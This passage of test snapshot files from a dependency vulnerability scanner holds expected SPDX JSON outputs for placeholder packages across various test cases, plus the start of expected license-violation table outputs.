"SPDXRef-Package-author1-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author1%2Fmine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the dotnet/pe extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:nuget/mine2@3.2.5" } ] }, { "name": "author3/mine3", 
"SPDXID": "SPDXRef-Package-author3-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/author3%2Fmine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author1-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author1-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-author3-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-author3-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": 
"DESCRIBES" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/no_sources - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_no_packages - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson 
extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", 
"relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", 
"versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", 
"relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", 
"supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": 
"SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": 
"SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", 
"licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson 
extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.10.2-rc", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.10.2-rc" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", 
"filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "5.9.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@5.9.0" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", 
"versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- ================================================ FILE: internal/output/__snapshots__/table_test.snap ================================================ [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
--- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬────────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼────────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfile │ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. 
